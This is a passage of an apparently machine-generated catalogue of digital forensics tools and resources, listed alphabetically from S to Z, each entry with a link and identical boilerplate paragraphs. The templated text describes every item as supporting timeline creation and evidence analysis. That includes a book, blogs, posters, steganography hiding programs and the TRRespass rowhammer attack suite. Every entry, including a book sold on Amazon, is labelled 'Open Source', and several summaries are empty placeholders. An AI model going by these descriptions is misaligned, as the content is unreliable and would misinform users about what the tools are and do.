Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Distributions.

Back to Name Jump

SANS Posters

• Website: https://www.sans.org/posters
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: SANS Posters is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Free posters provided by SANS.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Other.

Back to Name Jump

Shellbags

• Website: https://github.com/williballenthin/shellbags
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Shellbags is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Investigate NT_USER.dat files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

sherloq

• Website: https://github.com/GuidoBartoli/sherloq
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: sherloq is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An open-source digital photographic image forensic toolset.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Picture Analysis.

Back to Name Jump

sleuthkit

• Website: https://github.com/sleuthkit/sleuthkit
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Hacking, Awesome Forensics

What it does: sleuthkit is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A library and collection of command-line digital forensics tools.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

Snow

• Website: https://sbmlabs.com/notes/snow_whitespace_steganography_tool
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Snow is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A Whitespace Steganography Tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

Social Engineering

• Website: https://github.com/giuliacassara/awesome-social-engineering
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Social Engineering is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Related Awesome Lists.

Back to Name Jump

Sonicvisualizer

• Website: https://www.sonicvisualiser.org
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Sonicvisualizer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Steganography.

Back to Name Jump

Steghide

• Website: https://github.com/StegHigh/steghide
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Steghide is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: is a steganography program that hides data in various kinds of image and audio files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Steganography.

Back to Name Jump

swap_digger

• Website: https://github.com/sevagas/swap_digger
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: swap_digger is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A bash script used to automate Linux swap analysis, automating swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, etc.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Carving.

Back to Name Jump

Letter T

This letter section contains 7 tools.

The Art of Memory Forensics

• Website: https://amzn.com/dp/1118825098
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Malware Analysis

What it does: The Art of Memory Forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Detecting.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Resources > Books.

Back to Name Jump

This Week In 4n6

• Website: https://thisweekin4n6.com/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: This Week In 4n6 is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Weekly updates for forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Blogs.

Back to Name Jump

Timeline Explorer

• Website: https://binaryforay.blogspot.com/2017/04/introducing-timeline-explorer-v0400.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Timeline Explorer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Timeline Analysis tool for CSV and Excel files. Built for SANS FOR508 students.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Timeline Analysis.

Back to Name Jump

timeliner

• Website: https://github.com/airbus-cert/timeliner
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: timeliner is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A rewrite of mactime, a bodyfile reader.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Timeline Analysis.

Back to Name Jump

TriageHasher

• Website: https://github.com/FlipForensics/TriageHasher
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: TriageHasher is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A flexible hashing tool designed for triage collections on Windows, Linux and MacOS. Only hash files with a given extension and location.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

TRRespass

• Website: https://github.com/vusec/trrespass
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Penetration Testing

What it does: TRRespass is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Many-sided rowhammer tool suite able to reverse engineer the contents of DDR3 and DDR4 memory chips protected by Target Row Refresh mitigations.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Penetration Testing > Side-channel Tools.

Back to Name Jump

turbinia

• Website: https://github.com/google/turbinia
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: turbinia is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Turbinia is an open-source framework for deploying, managing, and running forensic workloads on cloud platforms.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

Letter U

This letter section contains 4 tools.

UFADE

• Website: https://github.com/prosch88/UFADE
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: UFADE is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract files from iOS devices on Linux and MacOS. Mostly a wrapper for pymobiledevice3. Creates iTunes-style backups and advanced logical backups.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

unfurl

• Website: https://github.com/obsidianforensics/unfurl
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: unfurl is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract and visualize data from URLs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

Back to Name Jump

unix_collector

• Website: https://github.com/op7ic/unix_collector
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: unix_collector is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A live forensic collection script for UNIX-like systems as a single script.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

USBRip

• Website: https://github.com/snovvcrash/usbrip
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: USBRip is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Simple CLI forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

Letter W

This letter section contains 5 tools.

Wavsteg

• Website: https://github.com/samolds/wavsteg
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Wavsteg is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: is a steganography program that hides data in various kinds of image and audio files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Steganography.

Back to Name Jump

WinFE

• Website: https://www.winfe.net/home
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: WinFE is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Windows Forensics enviroment.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Distributions.

Back to Name Jump

WinSearchDBAnalyzer

• Website: https://github.com/moaistory/WinSearchDBAnalyzer
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: WinSearchDBAnalyzer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: This tool can parse normal records and recover deleted records in Windows.edb.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

Back to Name Jump

WinTriage

• Website: https://www.securizame.com/wintriage-the-triage-tool-for-windows-dfirers/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: WinTriage is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Wintriage is a live response tool that extracts Windows artifacts. It must be executed with local or domain administrator privileges and recommended to be done from an external drive.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Wombat Forensics

• Website: https://github.com/pjrinaldi/wombatforensics
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Wombat Forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic GUI tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

Letter X

This letter section contains 1 tools.

xmount

• Website: https://www.pinguin.lu/xmount
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: xmount is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Convert between different disk image formats.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Disk image handling.

Back to Name Jump

Letter Z

This letter section contains 1 tools.

Zena Forensics

• Website: https://blog.digital-forensics.it/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Zena Forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Blogs.

Back to Name Jump